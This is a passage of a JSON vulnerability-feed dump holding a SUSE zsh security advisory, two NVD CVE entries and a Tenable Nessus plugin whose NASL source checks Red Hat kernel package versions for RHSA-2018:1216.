"zsh-debuginfo-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh", "operator": "lt"}], "description": "This update for zsh fixes the following issues:\n\n - CVE-2014-10070: environment variable injection could lead to local\n privilege escalation (bnc#1082885)\n\n - CVE-2014-10071: buffer overflow in exec.c could lead to denial of\n service. (bnc#1082977)\n\n - CVE-2014-10072: buffer overflow in utils.c when scanning very long\n directory paths for symbolic links. (bnc#1082975)\n\n - CVE-2016-10714: In zsh before 5.3, an off-by-one error resulted in\n undersized buffers that were intended to support PATH_MAX characters.\n (bnc#1083250)\n\n - CVE-2017-18205: In builtin.c when sh compatibility mode is used, a\n NULL pointer dereference could lead to denial of service (bnc#1082998)\n\n - CVE-2018-1071: exec.c:hashcmd() function vulnerability could lead to\n denial of service. (bnc#1084656)\n\n - CVE-2018-1083: Autocomplete vulnerability could lead to privilege\n escalation. 
(bnc#1087026)\n\n - CVE-2018-7549: In params.c in zsh through 5.4.2, there is a crash\n during a copy of an empty hash table, as demonstrated by typeset -p.\n (bnc#1082991)\n\n - CVE-2017-18206: buffer overrun in xsymlinks could lead to denial of\n service (bnc#1083002)\n\n - Autocomplete and REPORTTIME broken (bsc#896914)\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T18:07:15", "title": "Security update for zsh (important)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1071", "CVE-2017-18206", "CVE-2014-10071", "CVE-2016-10714", "CVE-2018-1083", "CVE-2018-7549", "CVE-2014-10072", "CVE-2017-18205", "CVE-2014-10070"], "modified": "2018-04-25T18:07:15", "id": "SUSE-SU-2018:1072-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00070.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-04-26T10:57:39", "references": ["https://security.netapp.com/advisory/ntap-20180425-0001/"], "description": "NetApp OnCommand Unified Manager for Linux versions 7.2 though 7.3 ship with the Java Debug Wire Protocol (JDWP) enabled which allows unauthorized local attackers to execute arbitrary code.", "edition": 1, "reporter": "NVD", "published": "2018-04-25T17:29:00", "title": "CVE-2018-5486", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-5486"], "scanner": [], "modified": "2018-04-25T17:29:00", "cpe": [], "id": "CVE-2018-5486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5486", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T10:56:56", "references": ["https://bugs.eclipse.org/bugs/show_bug.cgi?id=530102"], "description": "In Eclipse Mosquitto 1.4.14, if a Mosquitto instance is set running with a configuration file, then sending a HUP signal to server triggers the configuration to be reloaded from 
disk. If there are lots of clients connected so that there are no more file descriptors/sockets available (default limit typically 1024 file descriptors on Linux), then opening the configuration file will fail.", "edition": 1, "reporter": "NVD", "published": "2018-04-25T09:29:00", "title": "CVE-2017-7652", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-7652"], "scanner": [], "modified": "2018-04-25T09:29:00", "cpe": [], "id": "CVE-2017-7652", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7652", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-04-26T02:17:01", "references": ["https://www.redhat.com/security/data/cve/CVE-2017-8824.html", "http://rhn.redhat.com/errata/RHSA-2018-1216.html"], "pluginID": "109336", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update Support, and Red Hat Enterprise Linux 7.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting this issue.\n\nBug Fix(es) :\n\n* Previously, the XFS code included a circular dependency between the xfs-log and the xfs-cil workqueues. Consequently, an XFS deadlock occurred in some cases. 
This update adds a new workqueue dedicated to the log covering background task to avoid the deadlock. (BZ#1543303)\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines.\nThe Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1553181)", "edition": 1, "reporter": "Tenable", "published": "2018-04-25T00:00:00", "title": "RHEL 7 : kernel (RHSA-2018:1216)", "type": "nessus", "enchantments": {}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824"], "modified": "2018-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2018-1216.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=109336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1216. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109336);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/04/25 13:43:12\");\n\n script_cve_id(\"CVE-2017-8824\");\n script_xref(name:\"RHSA\", value:\"2018:1216\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2018:1216)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.2\nAdvanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended\nUpdate Support, and Red Hat Enterprise Linux 7.2 Update Services for\nSAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824,\nImportant)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting this issue.\n\nBug Fix(es) :\n\n* Previously, the XFS code included a circular dependency between the\nxfs-log and the xfs-cil workqueues. Consequently, an XFS deadlock\noccurred in some cases. This update adds a new workqueue dedicated to\nthe log covering background task to avoid the deadlock. 
(BZ#1543303)\n\n* The kernel build requirements have been updated to the GNU Compiler\nCollection (GCC) compiler version that has the support for Retpolines.\nThe Retpolines mechanism is a software construct that leverages\nspecific knowledge of the underlying hardware to mitigate the branch\ntarget injection, also known as Spectre variant 2 vulnerability\ndescribed in CVE-2017-5715. (BZ#1553181)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2018-1216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2017-8824.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1216\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", reference:\"kernel-abi-whitelists-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", 
reference:\"kernel-debug-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", reference:\"kernel-doc-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}}